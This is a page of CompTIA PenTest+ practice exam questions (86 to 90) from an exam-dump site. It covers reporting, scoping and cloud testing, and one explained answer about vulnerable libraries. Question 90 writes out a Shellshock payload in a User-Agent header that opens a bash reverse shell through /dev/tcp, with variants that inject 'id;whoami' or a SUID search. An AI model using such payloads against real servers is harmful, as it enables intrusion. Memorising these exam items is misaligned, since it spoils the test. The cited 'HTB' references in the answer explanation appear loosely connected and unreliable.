Free Access CompTIA.PT0-003.v2024-10-28.q132 Practice Test (Page 19)

Question 86

A penetration tester presents the following findings to stakeholders:
Control | Number of findings | Risk | Notes
Encryption | 1 | Low | Weak algorithm noted
Patching | 8 | Medium | Unsupported systems
System hardening | 2 | Low | Baseline drift observed
Secure SDLC | 10 | High | Libraries have vulnerabilities
Password policy | 0 | Low | No exceptions noted
Based on the findings, which of the following recommendations should the tester make? (Select two).

A.Develop a secure encryption algorithm.

B.Deploy an asset management system.

C.Write an SDLC policy.

D.Implement an SCA tool.

E.Obtain the latest library version.

F.Patch the libraries.

Correct Answer: D,E

Based on the findings, the focus should be on addressing vulnerabilities in libraries and ensuring their security. Here's why options D and E are correct:
Implement an SCA Tool:
SCA (Software Composition Analysis) tools are designed to analyze and manage open-source components in an application. Implementing an SCA tool would help in identifying and managing vulnerabilities in libraries, aligning with the finding of vulnerable libraries in the secure SDLC process.
This recommendation addresses the high-risk finding related to the Secure SDLC by providing a systematic approach to manage and mitigate vulnerabilities in software dependencies.
Obtain the Latest Library Version:
Keeping libraries up to date is a fundamental practice in maintaining the security of an application. Ensuring that the latest, most secure versions of libraries are used directly addresses the high-risk finding related to vulnerable libraries.
This recommendation is a direct and immediate action to mitigate the identified vulnerabilities.
Other Options Analysis:
Develop a Secure Encryption Algorithm: This is not practical or necessary given that the issue is with the use of a weak algorithm, not the need to develop a new one.
Deploy an Asset Management System: While useful, this is not directly related to the identified high-risk issue of vulnerable libraries.
Write an SDLC Policy: While helpful, the more immediate and effective actions involve implementing tools and processes to manage and update libraries.
Reference from Pentest:
Horizontall HTB: Demonstrates the importance of managing software dependencies and using tools to identify and mitigate vulnerabilities in libraries.
Writeup HTB: Highlights the need for keeping libraries updated to ensure application security and mitigate risks.
Conclusion:
Options D and E, implementing an SCA tool and obtaining the latest library version, are the most appropriate recommendations to address the high-risk finding related to vulnerable libraries in the Secure SDLC process.

Question 87

A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test.
Which of the following describes the scope of the assessment?

A.Unknown environment testing

B.Physical environment testing

C.Known environment testing

D.Partially known environment testing

Question 88

Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?

A.Executive summary of the penetration-testing methods used

B.Bill of materials including supplies, subcontracts, and costs incurred during assessment

C.Quantitative impact assessments given a successful software compromise

D.Code context for instances of unsafe type-casting operations

Question 89

A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.
Which of the following should the tester verify FIRST to assess this risk?

A.Whether the connection between the cloud and the client is secure

B.Whether the cloud applications were developed using a secure SDLC

C.Whether the client's employees are trained properly to use the platform

D.Whether sensitive client data is publicly accessible

Question 90

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept":
"text/html,application/xhtml+xml,application/xml"}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

A.exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept":
"text/html,application/xhtml+xml,application/xml"}

B.exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept":
"text/html,application/xhtml+xml,application/xml"}

C.exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept":
"text/html,application/xhtml+xml,application/xml"}

D.exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept":
"text/html,application/xhtml+xml,application/xml"}

Latest Upload: 200PaloAltoNetworks.NGFW-Engineer.v2026-05-01.q43; 293Nokia.4A0-113.v2026-05-01.q69; 252EC-COUNCIL.312-49v11.v2026-04-30.q214; 227Microsoft.MB-820.v2026-04-30.q101; 207Salesforce.MC-202.v2026-04-30.q57; 204BICSI.INSTC_V8.v2026-04-29.q53; 332NMLS.MLO.v2026-04-28.q82; 241NCARB.Project-Management.v2026-04-28.q27; 457EMC.D-AV-DY-23.v2026-04-27.q184; 1110ServiceNow.CSA.v2026-04-27.q483

Question 86

Question 87

Question 88

Question 89

Question 90

Download PDF File